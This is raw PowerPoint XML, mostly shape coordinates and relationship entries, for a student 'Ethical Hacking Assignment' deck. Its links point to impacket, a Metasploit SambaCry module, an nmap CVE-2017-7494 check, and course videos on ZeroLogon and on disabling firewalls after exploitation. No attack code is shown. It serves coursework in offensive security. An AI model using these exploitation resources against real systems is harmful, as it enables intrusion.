        <p:cNvPr id="64" name="Shape 64"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65" name="Google Shape;65;p10"/>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052643"/>
            </a:gs>
            <a:gs pos="100000">
              <a:srgbClr val="041523"/>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92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indent="-317500" lvl="1" marL="9144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indent="-317500" lvl="2" marL="13716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indent="-317500" lvl="3" marL="18288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indent="-317500" lvl="4" marL="22860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indent="-317500" lvl="5" marL="27432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indent="-317500" lvl="6" marL="32004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indent="-317500" lvl="7" marL="36576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indent="-317500" lvl="8" marL="41148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hyperlink" Target="https://www.vpn.net/linux" TargetMode="External"/><Relationship Id="rId5"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hyperlink" Target="https://secure.logmein.com/central/Central.aspx"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hyperlink" Target="https://github.com/SecureAuthCorp/impacket.git"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28.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image" Target="../media/image33.pn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 Id="rId3"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 Id="rId3"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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image51.png"/><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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image48.png"/><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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5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6.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5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7.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6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8.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image49.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5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9.xml"/><Relationship Id="rId3"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0.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5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1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5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1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3.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://stackoverflow.com/questions/29902700/os-detection-using-nmap-for-a-particular-ip-address" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6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4.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6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5.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6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6.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6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7.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5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9.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7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1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0.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image68.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6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8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2.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image66.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3.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image63.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image73.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4.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.youtube.com/watch?v=AfYuxOHCXHw" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image71.jpg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image72.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5.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image75.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7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6.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image78.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image77.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8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7.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.youtube.com/watch?v=4QXvn5q-zNA" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image79.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9.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image76.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image81.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8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0.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8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1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image86.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image83.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide82.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://linuxize.com/post/etc-shadow-file/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout9.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide82.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.samba.org/index.php/Build_Samba_from_Source" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://packages.debian.org/jessie/samba" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/sshuttle/sshuttle" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://releases.ubuntu.com/16.04/" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://old-releases.ubuntu.com/releases/14.04.5/%E2%80%8B" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=lGr7VUCBvOQ" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/linux/samba/is_known_pipename.md"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3.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/SecureAuthCorp/impacket" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=GNnt6ZB2x5k" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://5h4d0wb0y.github.io/2017-06-25-stapler/" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@lucideus/sambacry-rce-exploit-lucideus-research-3a3e5bd9e17c" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://itsfoss.com/ppa-guide/" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nmap.org/nsedoc/scripts/smb-vuln-cve-2017-7494.html"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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=c5OLZ9g48io" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ivid2.np.edu.sg/media/EH+Assignment+%28SambaCry+%26+ZeroLogOn%29/1_wv17pm1e" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=AfYuxOHCXHw" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=4QXvn5q-zNA" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ivid2.np.edu.sg/media/EH%20Assignment%20Denying%20File%20Access%20Post%20Exploit/1_pqvpvqdb" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ivid2.np.edu.sg/media/EH%20Assignment%20Disabling%20Firewall%20Post%20Exploit/1_gpzufzh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ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5237375" y="3670025"/>
            <a:ext cx="31296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Ethical Hacking Assignment</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102" name="Google Shape;102;p18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5237375" y="4181150"/>
            <a:ext cx="31296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Ryan Ng, Ng Ray Son</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="103" name="Google Shape;103;p18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2238757" y="4488644"/>
            <a:ext cx="816022" cy="427879"/>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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3470397" y="1215078"/>
            <a:ext cx="406499" cy="127245"/>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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3559034" y="1342660"/>
            <a:ext cx="229224" cy="91349"/>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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3624733" y="1459947"/>
            <a:ext cx="114624" cy="98403"/>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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3378712" y="1082122"/>
            <a:ext cx="589869" cy="163910"/>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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-226081" y="902208"/>
            <a:ext cx="3448945" cy="3969997"/>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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="36760" y="2657970"/>
            <a:ext cx="938276" cy="936765"/>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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1655007" y="2725228"/>
            <a:ext cx="24" cy="24"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="1" w="1">
                <a:moveTo>
                  <a:pt x="1" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1031545" y="2553759"/>
            <a:ext cx="669341" cy="660798"/>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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1529537" y="1971857"/>
            <a:ext cx="426367" cy="424831"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="17705" w="17769">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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1075696" y="1926026"/>
            <a:ext cx="301065" cy="297994"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="12419" w="12547">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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1994248" y="1967274"/>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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1994248" y="2098694"/>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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1994248" y="2230115"/>
            <a:ext cx="987178" cy="38224"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="1593" w="41141">
                <a:moveTo>
                  <a:pt x="1" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1" y="1593"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41140" y="1593"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="411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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1994248" y="249446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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1994248" y="262588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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1994248" y="2888730"/>
            <a:ext cx="987178" cy="38224"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="1593" w="41141">
                <a:moveTo>
                  <a:pt x="1" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1" y="1592"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41140" y="1592"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="411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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1994248" y="3020150"/>
            <a:ext cx="987178" cy="38224"/>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a:off x="1994248" y="328296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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="58164" y="1967274"/>
            <a:ext cx="1705373" cy="38224"/>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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="58164" y="2098694"/>
            <a:ext cx="1705373" cy="38224"/>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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="58164" y="2363047"/>
            <a:ext cx="1147609" cy="38248"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="1594" w="47827">
                <a:moveTo>
                  <a:pt x="0" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1593"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47827" y="1593"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="478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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2108848" y="1701385"/>
            <a:ext cx="701422" cy="114648"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="4778" w="29232">
                <a:moveTo>
                  <a:pt x="1" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1" y="4777"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29232" y="4777"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="292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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="560907" y="1701385"/>
            <a:ext cx="699886" cy="114648"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="4778" w="29168">
                <a:moveTo>
                  <a:pt x="0" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="4777"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29167" y="4777"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="291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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1540239" y="2988045"/>
            <a:ext cx="735039" cy="1488386"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="62029" w="30633">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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1210164" y="4037850"/>
            <a:ext cx="76424" cy="382048"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="15922" w="3185">
                <a:moveTo>
                  <a:pt x="0" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="15922"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3185" y="15922"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="318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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="24523" y="394881"/>
            <a:ext cx="1228616" cy="426343"/>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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2605497" y="99575"/>
            <a:ext cx="1101778" cy="368659"/>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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-742573" y="2272898"/>
            <a:ext cx="233831" cy="200046"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="8337" w="9745">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
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2385439" y="1418388"/>
            <a:ext cx="233831" cy="200502"/>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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3338976" y="2473808"/>
            <a:ext cx="189513" cy="161270"/>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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="742741" y="4509280"/>
            <a:ext cx="189513" cy="162758"/>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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3910489" y="755070"/>
            <a:ext cx="187977" cy="162422"/>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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1221034" y="4212030"/>
            <a:ext cx="276182" cy="199518"/>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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-707421" y="2509753"/>
            <a:ext cx="195607" cy="1401284"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="58399" w="8152">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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3578878" y="1713623"/>
            <a:ext cx="779358" cy="716707"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="29869" w="3248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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1387439" y="827319"/>
            <a:ext cx="932182" cy="716707"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="29869" w="3884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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3328274" y="2971248"/>
            <a:ext cx="236879" cy="1473101"/>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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3759681" y="2919947"/>
            <a:ext cx="126382" cy="71193"/>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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4206947" y="3632911"/>
            <a:ext cx="151288" cy="169645"/>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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3902835" y="2990972"/>
            <a:ext cx="301065" cy="314934"/>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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3358844" y="2801628"/>
            <a:ext cx="234863" cy="151288"/>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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4240660" y="3481406"/>
            <a:ext cx="56460" cy="113328"/>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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3623197" y="2875820"/>
            <a:ext cx="116160" cy="57252"/>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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4191423" y="3335613"/>
            <a:ext cx="73593" cy="110881"/>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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1914609" y="1987070"/>
            <a:ext cx="215475" cy="415737"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="17326" w="898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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1742565" y="2580202"/>
            <a:ext cx="87750" cy="103778"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="4325" w="3657">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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1796962" y="2440191"/>
            <a:ext cx="68794" cy="109321"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="4556" w="2867">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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1778629" y="1845187"/>
            <a:ext cx="77552" cy="108361"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="4516" w="3232">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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1647209" y="1518015"/>
            <a:ext cx="213963" cy="213963"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="8917" w="8917">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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1709860" y="1717486"/>
            <a:ext cx="87126" cy="100059"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="4170" w="3631">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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1658918" y="2705552"/>
            <a:ext cx="222626" cy="225985"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="9418" w="9278">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p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-828907" y="4537210"/>
            <a:ext cx="309464" cy="315150"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="13134" w="12897">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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-368419" y="4909037"/>
            <a:ext cx="125566" cy="57924"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="2414" w="5233">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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-918433" y="4248190"/>
            <a:ext cx="53629" cy="112105"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="4672" w="2235">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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-887767" y="4396863"/>
            <a:ext cx="71865" cy="110137"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="4590" w="2995">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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-977892" y="4039386"/>
            <a:ext cx="151288" cy="171156"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="7133" w="6305">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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-509462" y="4852241"/>
            <a:ext cx="126022" cy="70401"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="2934" w="5252">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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-209260" y="4890537"/>
            <a:ext cx="227713" cy="151288"/>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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1331051" y="1643317"/>
            <a:ext cx="230784" cy="230784"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="9618" w="9618">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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2385439" y="588929"/>
            <a:ext cx="230760" cy="230784"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="9618" w="9617">
                <a:moveTo>
                  <a:pt x="1" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1" y="9617"/>
                </a:lnTo>
                <a:lnTo>
